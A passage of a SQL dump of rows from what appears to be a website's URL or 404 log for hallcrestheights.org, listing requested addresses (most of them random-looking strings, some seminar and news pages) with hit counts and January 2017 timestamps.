00:00:00'),(2648,'http://www.hallcrestheights.org/uptt-mnbeatg-k32712-rbnqc-dcncxr-i20162634-dhcpgzz-dllimvyx-jltfeob-kebwivsm-qkrf-bmlkmsth.htm',NULL,'','',1,0,'2017-01-07 22:41:15','0000-00-00 00:00:00'),(2649,'http://www.hallcrestheights.org/uptt-mnbeatg-rbnqc-dcncxr/dhcpgzz-dllimvyx-jltfeob-kebwivsm-i20162634-qkrf-k11262-bmlkmsth-owgwhlkj.htm',NULL,'','',1,0,'2017-01-07 22:41:17','0000-00-00 00:00:00'),(2650,'http://www.hallcrestheights.org/kzpf-fmsxklr-dedhwge-fvbbg-i20162630-zagpe-ciyyuwu-vfzt-jigjinam-zbcng-tfmlyr-k17445-ghdfi/',NULL,'','',1,0,'2017-01-07 22:41:31','0000-00-00 00:00:00'),(2651,'http://www.hallcrestheights.org/ajqx-xucuzao-i20162630-fifephi-ijimj-njbog-k16445-tsakbcc-gyfm-dvjuxzle-ktsls-hxosqq-jvfyo-ihttjpu/',NULL,'','',1,0,'2017-01-07 22:41:56','0000-00-00 00:00:00'),(2652,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-i20162635-bkeb-k15500-wivsmqkr-fbmlkmst-howgwh-lkjlbm.htm',NULL,'','',1,0,'2017-01-07 22:42:26','0000-00-00 00:00:00'),(2653,'http://www.hallcrestheights.org/edzvdlq-i20162633-comnnmmc/k11078-awvbfuja-pyvrlfl.htm',NULL,'','',1,0,'2017-01-07 22:43:02','0000-00-00 00:00:00'),(2654,'http://www.hallcrestheights.org/fadl-ajfnlgf-i20162628-pcvwg-myhdec-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-papu-k47892-hgfqvjdc-lbbvzgrc.htm',NULL,'','',1,0,'2017-01-07 22:43:15','0000-00-00 00:00:00'),(2655,'http://www.hallcrestheights.org/tkuykfj-dnjjb-i20162630-ucyupa-jaylrl-wfvdy-k35273-ruqp-klsdef-hxdfpd-fufpfaj-npvza-ttuxd-wvpeekly/',NULL,'','',1,0,'2017-01-07 22:44:05','0000-00-00 00:00:00'),(2656,'http://www.hallcrestheights.org/oiyizgol-rcmw-fbsnopd-gfnhskrl-jrgfctfz-i20162630-fiwx-k48901-wmak/',NULL,'','',4,0,'2017-01-07 22:48:07','0000-00-00 00:00:00'),(2657,'http://www.hallcrestheights.org/lugd-ltrsmxx-k10212-hypzq-jllzoh-i20162634-njumnte-cwfogywb-iwyrurf-gvfcwqzh-ribn-knyfeebs.htm',NULL,'','',1,0,'2017-01-07 22:51:40','0000-00-00 00:00:00'),(2658,'http://www.hallcrestheights.org/fadl-ajfnlgf-k12012-pcvwg-myhdec-i20162634-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-papu-hgfqvjdc.htm',NULL,'','',1,0,'2017-01-07 22:55:14','0000-00-00 00:00:00'),(2659,'http://www.hallcrestheights.org/pcsc-qrufunp-k53412-kwxpo-i20162633-ideotw-tvsoarm-osmgepla-lheliyr-qiyqfufx-vugo-wopegtqa.htm',NULL,'','',1,0,'2017-01-07 23:02:52','0000-00-00 00:00:00'),(2660,'http://www.hallcrestheights.org/vqjn-yspvhol-k31812-jpeur-rtpilu-i20162634-ourxivl-btrhnnmt-qzkowts-xppbgrrc-dsik-ibkxnpfo.htm',NULL,'','',1,0,'2017-01-07 23:06:02','0000-00-00 00:00:00'),(2661,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-i20162635-k12757-paja-ylrlwfv-dyruqpkl-sdefhxdf/',NULL,'','',1,0,'2017-01-07 23:09:50','0000-00-00 00:00:00'),(2662,'http://www.hallcrestheights.org/ixnmu-k27064-eahw-hioz-hjxbnwpg-eyooayik-i20162633-uksszq-cebaq-domytn-iholb.htm',NULL,'','',1,0,'2017-01-07 23:16:18','0000-00-00 00:00:00'),(2663,'http://www.hallcrestheights.org/k16995-tkuy-kfjdnjj-bucyupa-jaylr/i20162630-lwfvd-yruqpkl-sdef-hxdfpdfu-fpfaj-npvzat-tuxdw/',NULL,'','',1,0,'2017-01-07 23:16:42','0000-00-00 00:00:00'),(2664,'http://www.hallcrestheights.org/i20162630-yembjvh-tqqdc-kzfltz-k55923-terqbw/nswns-njpl-pftrrj-ncypjo-qwgzjev-ihsdp/',NULL,'','',1,0,'2017-01-07 23:17:10','0000-00-00 00:00:00'),(2665,'http://www.hallcrestheights.org/uptt-mnbeatg-rbnqc-dcncxr-dhcpgzz-dllimvyx-i20162634-jltfeob-kebwivsm-k31412-qkrf-bmlkmsth-owgwhlkj-lbmrgir.htm',NULL,'','',1,0,'2017-01-07 23:17:33','0000-00-00 00:00:00'),(2666,'http://www.hallcrestheights.org/zmkuedt-zjivyoqx-ifgxuhxp-i20162633-tvuhmiw/nzkorp-vubfg-nqtpmhpr-bikz-k10878-onmtla-jhol.htm',NULL,'','',1,0,'2017-01-07 23:18:02','0000-00-00 00:00:00'),(2667,'http://www.hallcrestheights.org/jgletk-ymdrqz-nrvmlk-swaz-i20162634-vkecqq-neeiaq-k52116-jzlnp-lqfcneb-xilnvox-bdjvee.htm',NULL,'','',1,0,'2017-01-07 23:18:23','0000-00-00 00:00:00'),(2668,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab-tnwyrqse-mgwkowh-i20162632-memxgk-ucybn-pzkicvej-xkul-k53228-zjcjkn-tsxj-lnuu-uvtff.htm',NULL,'','',1,0,'2017-01-07 23:18:51','0000-00-00 00:00:00'),(2669,'http://www.hallcrestheights.org/ixnmue-ahwhio-zhjxbn-wpge-yooayi-kukssz-k51816-qceba-qdomytn-i20162634-iholbde-ntafym-luzextl.htm',NULL,'','',1,0,'2017-01-07 23:19:15','0000-00-00 00:00:00'),(2670,'http://www.hallcrestheights.org/yemb-i20162629-k59095-jvhtqqd-ckzfltz-terqb/wnswn-snjplpf-trrj-ncypjoqw-gzjev/',NULL,'','',1,0,'2017-01-07 23:19:40','0000-00-00 00:00:00'),(2671,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr/k58995-glnik-ghhmb-i20162629-bxpgesm-rcai-ztbiauwd/',NULL,'','',1,0,'2017-01-07 23:20:06','0000-00-00 00:00:00'),(2672,'http://www.hallcrestheights.org/ixnm-ueahwhi-k54312-ozhjx-i20162633-bnwpge-yooayik-uksszqce-baqdomy-tniholbd-enta-fymluzex.htm',NULL,'','',1,0,'2017-01-07 23:20:15','0000-00-00 00:00:00'),(2673,'http://www.hallcrestheights.org/i20162628-uptt-k26992-mnbeatg-rbnqc-dcncxr-dhcpgzz-dllimvyx-jltfeob-kebwivsm-qkrf.htm',NULL,'','',1,0,'2017-01-07 23:20:36','0000-00-00 00:00:00'),(2674,'http://www.hallcrestheights.org/xhajvq-lwczbiqs/osqx-oqkgq-i20162629-k15199-aqyd/',NULL,'','',1,0,'2017-01-07 23:20:56','0000-00-00 00:00:00'),(2675,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu-uhvfc-i20162629-yzlsx-k58945-xqroxae-hksk/',NULL,'','',3,0,'2017-01-07 23:21:22','0000-00-00 00:00:00'),(2676,'http://www.hallcrestheights.org/i20162630-edzv-dlqcomn-k23532-nmmca-wvbfuj-apyvrlf-lxhqjkuh-kcmumbh-mgznkohe-yrup-xpudzikm.htm',NULL,'','',2,0,'2017-01-07 23:23:46','0000-00-00 00:00:00'),(2677,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-i20162633-zvsgcr-lycmc-zoqqelu-k5664-dpwcmeg.htm',NULL,'','',1,0,'2017-01-07 23:27:21','0000-00-00 00:00:00'),(2678,'http://www.hallcrestheights.org/yembjvht-qqdc-i20162634-kzfltzt-k34681-erqbwnsw-nsnjplpf-trrj-ncyp/',NULL,'','',2,0,'2017-01-07 23:31:01','0000-00-00 00:00:00'),(2679,'http://www.hallcrestheights.org/fadlaj-k9516-fnlgfp-cvwgmy-hdec-wxbdeu-dkovfi-ibptq-uhzxchh-rmxagfp-i20162635-apuhgf-qvjdclb.htm',NULL,'','',1,0,'2017-01-07 23:34:29','0000-00-00 00:00:00'),(2680,'http://www.hallcrestheights.org/bsoapaza-psta-k48001-sgmhcqc-mckfrdtf-kgpvbchs-i20162630-iwho-rklv/',NULL,'','',2,0,'2017-01-07 23:38:03','0000-00-00 00:00:00'),(2681,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-uourxivl-btrhnn-i20162632-mtqzk-owtsxp-pbgrr-cdsikib-k53184-kxnpfov.htm',NULL,'','',1,0,'2017-01-07 23:41:39','0000-00-00 00:00:00'),(2682,'http://www.hallcrestheights.org/company/topics/office/2016/pirouetto.php',NULL,'','',3,0,'2017-01-07 23:43:51','0000-00-00 00:00:00'),(2683,'http://www.hallcrestheights.org/web/news_release_list/',NULL,'','',4,0,'2017-01-07 23:44:44','0000-00-00 00:00:00'),(2684,'http://www.hallcrestheights.org/company/press/2016/1606_csw.html',NULL,'','',3,0,'2017-01-07 23:45:07','0000-00-00 00:00:00'),(2685,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-rdhcpgzz-dllimv-i20162632-yxjlt-feobke-k54084-bwivs-mqkrfbm-lkmstho.htm',NULL,'','',1,0,'2017-01-07 23:45:10','0000-00-00 00:00:00'),(2686,'http://www.hallcrestheights.org/joifa/formmail/kochi_seminar.html',NULL,'','',3,0,'2017-01-07 23:45:32','0000-00-00 00:00:00'),(2687,'http://www.hallcrestheights.org/kzpf-k16795-fmsxklr-i20162630-dedhwge-fvbbg/zagpe-ciyyuwu-vfzt-jigjinam-zbcng/',NULL,'','',1,0,'2017-01-07 23:47:14','0000-00-00 00:00:00'),(2688,'http://www.hallcrestheights.org/ryvh-rhmqtyy-sllge/ajanpd-i20162628-mefnxhq-fhjdyhao-k27342-xrcjhwu-vdsvezyt.htm',NULL,'','',1,0,'2017-01-07 23:47:40','0000-00-00 00:00:00'),(2689,'http://www.hallcrestheights.org/i20162628-pcsc-k47692-qrufunp-kwxpo-ideotw-tvsoarm-osmgepla-lheliyr-qiyqfufx-vugo.htm',NULL,'','',1,0,'2017-01-07 23:48:04','0000-00-00 00:00:00'),(2690,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-vtzpx-bxkcw-i20162629-k59445-jybtylw-osdu-ieqgwsog/',NULL,'','',1,0,'2017-01-07 23:48:31','0000-00-00 00:00:00'),(2691,'http://www.hallcrestheights.org/ixnmu-k52284-eahw-hioz-hjxbnwpg-eyooayik-uksszq-cebaq-domytn-iholb-dentafy-i20162636-mluzext.htm',NULL,'','',1,0,'2017-01-07 23:48:44','0000-00-00 00:00:00'),(2692,'http://www.hallcrestheights.org/i20162630-yemb-jvhtqqd-ckzfltz-terqb-wnswn-k16845-snjplpf-trrj-ncypjoqw-gzjev-ihsdpa/',NULL,'','',1,0,'2017-01-07 23:48:58','0000-00-00 00:00:00'),(2693,'http://www.hallcrestheights.org/lugd-ltrsmxx-k48042-hypzq/jllzoh-i20162628-njumnte-cwfogywb-iwyrurf-gvfcwqzh.htm',NULL,'','',1,0,'2017-01-07 23:49:21','0000-00-00 00:00:00'),(2694,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-k62401-lnikghhm-bbxpgesm-rcai-i20162631-ztbi/',NULL,'','',2,0,'2017-01-07 23:52:19','0000-00-00 00:00:00'),(2695,'http://hallcrestheights.org/hh-brochure.pdf',NULL,'','',16,0,'2017-01-07 23:54:54','0000-00-00 00:00:00'),(2696,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-k43104-xzmnp-zvsgcr-lycmc-zoqqelu-i20162636-dpwcmeg.htm',NULL,'','',1,0,'2017-01-07 23:55:55','0000-00-00 00:00:00'),(2697,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-i20162635-xrgl-nikghhm-bbxpgesm-k11857-rcaiztbi/',NULL,'','',1,0,'2017-01-08 00:03:09','0000-00-00 00:00:00'),(2698,'http://www.hallcrestheights.org/joifa/formmail/office_seminar_2016_osaka.html',NULL,'','',3,0,'2017-01-08 00:10:07','0000-00-00 00:00:00'),(2699,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-yldpijaa-mdurta-enpgg-wtdvlx-k22404-tdqku-nfglqrh-i20162636-zyonxfe.htm',NULL,'','',1,0,'2017-01-08 00:10:13','0000-00-00 00:00:00'),(2700,'http://www.hallcrestheights.org/useful/choose_chair.html',NULL,'','',4,0,'2017-01-08 00:11:00','0000-00-00 00:00:00'),(2701,'http://www.hallcrestheights.org/joifa/formmail/tottori_seminar.html',NULL,'','',3,0,'2017-01-08 00:11:24','0000-00-00 00:00:00'),(2702,'http://www.hallcrestheights.org/joifa/formmail/office_seminar_fukuoka.html',NULL,'','',4,0,'2017-01-08 00:11:49','0000-00-00 00:00:00'),(2703,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx/oqkgq-i20162636-aqyd-cptznzv-tjqoevp-k9999-caqwj/',NULL,'','',1,0,'2017-01-08 00:12:16','0000-00-00 00:00:00'),(2704,'http://www.hallcrestheights.org/pdf/jimutukue_takasa.pdf',NULL,'','',5,0,'2017-01-08 00:13:05','0000-00-00 00:00:00'),(2705,'http://www.hallcrestheights.org/company/topics/culture/2016/figueras.php',NULL,'','',3,0,'2017-01-08 00:13:31','0000-00-00 00:00:00'),(2706,'http://www.hallcrestheights.org/i20162637-ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-k10884-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw-scpuakq.htm',NULL,'','',1,0,'2017-01-08 00:13:42','0000-00-00 00:00:00'),(2707,'http://www.hallcrestheights.org/company/topics/medical/2016/lunacare.php',NULL,'','',2,0,'2017-01-08 00:13:56','0000-00-00 00:00:00'),(2708,'http://www.hallcrestheights.org/joifa/formmail/kurume_seminar.html',NULL,'','',1,0,'2017-01-08 00:14:23','0000-00-00 00:00:00'),(2709,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq-aqyd-k10649-cptznzv-tjqoevp-caqwj-i20162636-aluwty-bckb-sxbnbgnn-dorcajpp/',NULL,'','',1,0,'2017-01-08 00:14:47','0000-00-00 00:00:00'),(2710,'http://www.hallcrestheights.org/joifa/formmail/sasebo_seminar.html',NULL,'','',2,0,'2017-01-08 00:15:38','0000-00-00 00:00:00'),(2711,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-k11784-abtnwyrq-semgwkow-hmemxg-kucyb-i20162633-npzkic-vejxk-ulzjcjk-ntsxjln.htm',NULL,'','',1,0,'2017-01-08 00:17:18','0000-00-00 00:00:00'),(2712,'http://www.hallcrestheights.org/i20162632-gnfznxv-jxpaltit-jshkyjyl-k51628-dpijaam-durtae-npggw-tdvlxtdq.htm',NULL,'','',1,0,'2017-01-08 00:35:01','0000-00-00 00:00:00'),(2713,'http://www.hallcrestheights.org/zmkue-k7264-dtzj-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor-pvubf-gnqtpm-hprbi.htm',NULL,'','',1,0,'2017-01-08 00:42:05','0000-00-00 00:00:00'),(2714,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa/i20162635-jaylr-lwfv-dyruqpk-k39199-lsdefhx/',NULL,'','',1,0,'2017-01-08 00:46:18','0000-00-00 00:00:00'),(2715,'http://www.hallcrestheights.org/joifa/formmail/takamatsu_seminar.html',NULL,'','',3,0,'2017-01-08 00:46:48','0000-00-00 00:00:00'),(2716,'http://www.hallcrestheights.org/htxwhy-k10099-krsvsvhu-dykb-qxdos/fiet-yuaixnr-bdggsaa-rhefs-i20162636-kjydmr/',NULL,'','',1,0,'2017-01-08 00:47:00','0000-00-00 00:00:00'),(2717,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq/k10899-cmckf-i20162636-rdtf-kgpvbch-siwhork-lvzrt/',NULL,'','',1,0,'2017-01-08 00:47:52','0000-00-00 00:00:00'),(2718,'http://www.hallcrestheights.org/joifa/formmail/takaoka_seminar.html',NULL,'','',5,0,'2017-01-08 00:48:21','0000-00-00 00:00:00'),(2719,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-k10749-dykb-qxdos-fiet-yuaixnr-bdggsaa-rhefs-kjydmr-ujwi-i20162636-mjqiaaur/',NULL,'','',1,0,'2017-01-08 00:48:42','0000-00-00 00:00:00'),(2720,'http://www.hallcrestheights.org/upttmnb-eatgrbnq/k11678-cdcncxrd-hcpgzzd-llimvy-i20162633-xjltf.htm',NULL,'','',1,0,'2017-01-08 00:49:09','0000-00-00 00:00:00'),(2721,'http://www.hallcrestheights.org/qlbowci-ggece/i20162630-ayafxr-glnikg-hhmbb-k55823-xpge/',NULL,'','',1,0,'2017-01-08 00:49:33','0000-00-00 00:00:00'),(2722,'http://www.hallcrestheights.org/vqjn-k26742-yspvhol-i20162628-jpeur-rtpilu/ourxivl-btrhnnmt-qzkowts-xppbgrrc-dsik-ibkxnpfo-vpyaybgo.htm',NULL,'','',1,0,'2017-01-08 00:49:59','0000-00-00 00:00:00'),(2723,'http://www.hallcrestheights.org/gnfz-nxvjxpa-i20162634-ltitj-shkyjy-k33012-ldpijaa-mdurtaen-pggwtdv-lxtdqkun.htm',NULL,'','',1,0,'2017-01-08 00:59:51','0000-00-00 00:00:00'),(2724,'http://www.hallcrestheights.org/pcsc-qrufunp-kwxpo-ideotw-i20162628-k26892-tvsoarm-osmgepla-lheliyr-qiyqfufx.htm',NULL,'','',1,0,'2017-01-08 01:03:16','0000-00-00 00:00:00'),(2725,'http://www.hallcrestheights.org/i20162630-nfrkopd-obbum-golzes-k35223-rkwtzq/tqbsv-jcwj-bxnmyv-sssldj-znaahjb-kwxro/',NULL,'','',2,0,'2017-01-08 01:20:13','0000-00-00 00:00:00'),(2726,'http://www.hallcrestheights.org/xhajvql-wczbi-i20162630-qsosqx-oqkgqa-qydcp-k34673-tznz/',NULL,'','',1,0,'2017-01-08 01:20:58','0000-00-00 00:00:00'),(2727,'http://www.hallcrestheights.org/i20162628-ryvh-k48142-rhmqtyy-sllge-ajanpd/mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy.htm',NULL,'','',1,0,'2017-01-08 01:21:00','0000-00-00 00:00:00'),(2728,'http://www.hallcrestheights.org/ajqx-k17095-xucuzao-fifephi/ijimj-njbog-i20162630-tsakbcc-gyfm/',NULL,'','',1,0,'2017-01-08 01:21:43','0000-00-00 00:00:00'),(2729,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-i20162633-qxifgxuh-k5964-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-08 01:22:33','0000-00-00 00:00:00'),(2730,'http://www.hallcrestheights.org/vqjnysp-vholjpeu/i20162632-rrtpiluo-k52378-urxivlb-trhnnm.htm',NULL,'','',1,0,'2017-01-08 01:23:15','0000-00-00 00:00:00'),(2731,'http://www.hallcrestheights.org/vqjnysp-vholjpeu/k10778-rrtpiluo-urxivlb-trhnnm-i20162633-tqzko.htm',NULL,'','',1,0,'2017-01-08 01:24:01','0000-00-00 00:00:00'),(2732,'http://www.hallcrestheights.org/k4608-mrcqgbe-ifuwgrab-i20162634-tnwyrqse-mgwkowh-memxgk-ucybn-pzkicvej-xkul.htm',NULL,'','',1,0,'2017-01-08 01:24:29','0000-00-00 00:00:00'),(2733,'http://www.hallcrestheights.org/ryvhrh-k9766-mqtyys-llgeaj-anpd/mefnxh-qfhjdy-haoxr-i20162635-cjhwuvd-svezytw.htm',NULL,'','',1,0,'2017-01-08 01:24:49','0000-00-00 00:00:00'),(2734,'http://www.hallcrestheights.org/cwhriwg-k56323-pekzq-i20162630-dwkvum-zbsaii/mjzfo-zgdv-ddqjvd-obknly-kconedw/',NULL,'','',1,0,'2017-01-08 01:25:32','0000-00-00 00:00:00'),(2735,'http://www.hallcrestheights.org/i20162637-ryvhrhmq-tyysl-lgeajanp-dmefnxh/qfhj-k59790-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua-kqnjtn.htm',NULL,'','',1,0,'2017-01-08 01:26:17','0000-00-00 00:00:00'),(2736,'http://www.hallcrestheights.org/dvisci-wbvwku/i20162634-k51866-xkrbzo-msmv.htm',NULL,'','',1,0,'2017-01-08 01:27:07','0000-00-00 00:00:00'),(2737,'http://www.hallcrestheights.org/k10362-vqjn-yspvhol-jpeur-rtpilu/ourxivl-btrhnnmt-qzkowts-xppbgrrc-i20162634-dsik-ibkxnpfo-vpyaybgo.htm',NULL,'','',1,0,'2017-01-08 01:27:56','0000-00-00 00:00:00'),(2738,'http://www.hallcrestheights.org/oiyizgo-lrcmw-i20162630-fbsnop-dgfnhs-krljr-k36473-gfct/',NULL,'','',1,0,'2017-01-08 01:28:01','0000-00-00 00:00:00'),(2739,'http://www.hallcrestheights.org/mrcq-gbeifuw-k47742-grabt-nwyrqs/emgwkow-hmemxgku-cybnpzk-icvejxku-i20162628-lzjc-jkntsxjl.htm',NULL,'','',1,0,'2017-01-08 01:28:34','0000-00-00 00:00:00'),(2740,'http://www.hallcrestheights.org/mrcqg-k52084-beif-uwgr-abtnwyrq-i20162632-semgwkow-hmemxg-kucyb-npzkic-vejxk.htm',NULL,'','',1,0,'2017-01-08 01:31:33','0000-00-00 00:00:00'),(2741,'http://www.hallcrestheights.org/htxwhy-i20162629-krsvsvhu-dykb-qxdos-fiet-k5549-yuaixnr/',NULL,'','',1,0,'2017-01-08 01:35:06','0000-00-00 00:00:00'),(2742,'http://www.hallcrestheights.org/k53712-dvis-i20162633-ciwbvwk-uxkrb-zomsmv-uclzuph-vqawuoxz-mnpzvsg-crlycmcz.htm',NULL,'','',2,0,'2017-01-08 01:38:38','0000-00-00 00:00:00'),(2743,'http://www.hallcrestheights.org/k10512-pcsc-qrufunp-i20162634-kwxpo-ideotw-tvsoarm-osmgepla-lheliyr-qiyqfufx.htm',NULL,'','',1,0,'2017-01-08 01:45:41','0000-00-00 00:00:00'),(2744,'http://www.hallcrestheights.org/i20162637-vqjny-k11584-spvh-oljp-eurrtpil-uourxivl-btrhnn-mtqzk-owtsxp-pbgrr.htm',NULL,'','',1,0,'2017-01-08 01:52:44','0000-00-00 00:00:00'),(2745,'http://www.hallcrestheights.org/ajqxxuc-uzaof-i20162630-ifephi-ijimjn-jbogt-k46553-sakb/',NULL,'','',1,0,'2017-01-08 01:56:19','0000-00-00 00:00:00'),(2746,'http://www.hallcrestheights.org/mrcq-i20162633-gbeifuw-grabt-nwyrqs-k52812-emgwkow-hmemxgku-cybnpzk-icvejxku.htm',NULL,'','',1,0,'2017-01-08 01:59:49','0000-00-00 00:00:00'),(2747,'http://www.hallcrestheights.org/soegszx-yifet-i20162630-vtndyu-uhvfcy-zlsxx-k47453-qrox/',NULL,'','',1,0,'2017-01-08 02:03:23','0000-00-00 00:00:00'),(2748,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-ijimjn-jbogt-i20162630-k56173-sakb-ccgyfm/',NULL,'','',1,0,'2017-01-08 02:07:59','0000-00-00 00:00:00'),(2749,'http://www.hallcrestheights.org/i20162634-pcscqr-ufunpk/k51566-wxpoid-eotw-tvsoar-mosmge.htm',NULL,'','',1,0,'2017-01-08 02:08:44','0000-00-00 00:00:00'),(2750,'http://www.hallcrestheights.org/i20162632-zmkuedt-zjivyoqx/k52478-ifgxuhxp-tvuhmiw.htm',NULL,'','',1,0,'2017-01-08 02:09:30','0000-00-00 00:00:00'),(2751,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb/qxdosf-ietyu-aixn-i20162630-rbdggs-k56223-aarhef/',NULL,'','',1,0,'2017-01-08 02:10:17','0000-00-00 00:00:00'),(2752,'http://www.hallcrestheights.org/fadla-i20162633-jfnl-gfpc/vwgmyhde-cwxbdeud-k6214-kovfii-bptqu.htm',NULL,'','',1,0,'2017-01-08 02:10:59','0000-00-00 00:00:00'),(2753,'http://www.hallcrestheights.org/qlbo-i20162629-wciggec-eayafxr-glnik-ghhmb-k59645-bxpgesm-rcai-ztbiauwd-tvixp-mtzhzz-wzrqr-dcfpsmf/',NULL,'','',1,0,'2017-01-08 02:11:46','0000-00-00 00:00:00'),(2754,'http://www.hallcrestheights.org/ryvhrh-mqtyys-llgeaj-anpd-mefnxh-qfhjdy-haoxr-cjhwuvd-svezytw-i20162635-lcycws-k10416-cpuakqn.htm',NULL,'','',1,0,'2017-01-08 02:12:30','0000-00-00 00:00:00'),(2755,'http://www.hallcrestheights.org/bsoapaza-k7441-psta-sgmhcqc-i20162633-mckfrdtf-kgpvbchs/',NULL,'','',1,0,'2017-01-08 02:13:57','0000-00-00 00:00:00'),(2756,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-k52778-xbnwpgey-ooayiku/i20162632-ksszqc-ebaqd-omytniho-lbde-ntafym-luze-xtlf-ggcsd.htm',NULL,'','',1,0,'2017-01-08 02:14:01','0000-00-00 00:00:00'),(2757,'http://www.hallcrestheights.org/k53328-edzvdlq-comnnmmc-awvbfuja-pyvrlfl-xhqjku-hkcmu-i20162632-mbhmgznk-ohey-rupxpu-dzik-muss.htm',NULL,'','',1,0,'2017-01-08 02:14:48','0000-00-00 00:00:00'),(2758,'http://www.hallcrestheights.org/i20162628-jgle-tkymdrq-k48242-znrvm-lkswaz/vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-xbdj-veebikpt-jvlxfaye-ayabopl.htm',NULL,'','',1,0,'2017-01-08 02:15:36','0000-00-00 00:00:00'),(2759,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-rkwtz/qtqb-i20162635-svjcwjb-xnmyvss-sldjz-naahjb-k38499-kwxr/',NULL,'','',1,0,'2017-01-08 02:16:18','0000-00-00 00:00:00'),(2760,'http://www.hallcrestheights.org/yemb-jvhtqqd/i20162630-ckzfltz-k17495-terqb/',NULL,'','',1,0,'2017-01-08 02:17:04','0000-00-00 00:00:00'),(2761,'http://www.hallcrestheights.org/zmkue-k32484-dtzj-ivyo-qxifgxuh-xptvuhmi-wnzkor-i20162632-pvubf-gnqtpm-hprbi-kzonmtl-ajholjr.htm',NULL,'','',1,0,'2017-01-08 02:17:28','0000-00-00 00:00:00'),(2762,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-ijimjn-i20162630-jbogt-sakb-ccgyfm-dvjuxz-k35373-lektsls-hxosq-qjvfy/',NULL,'','',2,0,'2017-01-08 02:18:35','0000-00-00 00:00:00'),(2763,'http://www.hallcrestheights.org/oiyi-zgolrcm-i20162630-wfbsnop-dgfnh/skrlj-rgfctfz-fiwx-wmakoayo-smpql-gvegdf-vgcrc-k16895-bzmqnod/',NULL,'','',1,0,'2017-01-08 02:19:22','0000-00-00 00:00:00'),(2764,'http://www.hallcrestheights.org/oiyizgol-k8341-rcmw-fbsnopd-i20162633-gfnhskrl-jrgfctfz/',NULL,'','',1,0,'2017-01-08 02:21:00','0000-00-00 00:00:00'),(2765,'http://www.hallcrestheights.org/ixnmu-k52284-eahw-hioz-hjxbnwpg-eyooayik-uksszq-i20162632-cebaq-domytn-iholb-dentafy-mluzext.htm',NULL,'','',1,0,'2017-01-08 02:24:34','0000-00-00 00:00:00'),(2766,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-k10884-fhjdyh-aoxrc-i20162633-jhwuvd-svezy-twlcycw-scpuakq.htm',NULL,'','',1,0,'2017-01-08 02:28:04','0000-00-00 00:00:00'),(2767,'http://www.hallcrestheights.org/lugdltr-smxxhypz-k4908-qjllzohn-jumntec-wfogyw-biwyr-urfgvfcw-qzhr-i20162634-ibnkny-feeb-sbjh.htm',NULL,'','',1,0,'2017-01-08 02:31:37','0000-00-00 00:00:00'),(2768,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-cdcncxrd-hcpgzzd-k4008-llimvy-xjltf-eobkebwi-vsmq-i20162634-krfbml-kmst-howg.htm',NULL,'','',1,0,'2017-01-08 02:35:08','0000-00-00 00:00:00'),(2769,'http://www.hallcrestheights.org/i20162637-jgletk-ymdrqz-nrvmlk-swaz-vkecqq-neeiaq-jzlnp-lqfcneb-xilnvox-bdjvee-k34176-bikptjv.htm',NULL,'','',1,0,'2017-01-08 02:38:40','0000-00-00 00:00:00'),(2770,'http://www.hallcrestheights.org/pcscqru-funpkwxp-oideotwt-vsoarmo-k31728-smgepl-alhel-i20162632-iyrqiyqf-ufxv-ugowop-egtq-amzi.htm',NULL,'','',1,0,'2017-01-08 02:49:19','0000-00-00 00:00:00'),(2771,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-rrtpiluo-urxivlb-trhnnm-tqzko-wtsxppbg-i20162633-rrcd-k10128-sikibk-xnpf-ovpy.htm',NULL,'','',1,0,'2017-01-08 02:52:48','0000-00-00 00:00:00'),(2772,'http://www.hallcrestheights.org/oiyizg-i20162629-olrcmwfb-snop-dgfnh-skrl-k4649-jrgfctf/',NULL,'','',3,0,'2017-01-08 02:59:53','0000-00-00 00:00:00'),(2773,'http://www.hallcrestheights.org/jgletky-mdrqznrv-mlkswazv-kecqqne-i20162630-eiaqjz-lnplq-fcnebxil-nvox-bdjvee-k38388-bikp-tjvl.htm',NULL,'','',1,0,'2017-01-08 03:03:25','0000-00-00 00:00:00'),(2774,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-k32628-xbnwpgey-ooayiku-ksszqc-ebaqd-i20162632-omytniho-lbde-ntafym-luze-xtlf.htm',NULL,'','',1,0,'2017-01-08 03:06:57','0000-00-00 00:00:00'),(2775,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx-i20162632-bxkc-k38489-wjybtyl/',NULL,'','',1,0,'2017-01-08 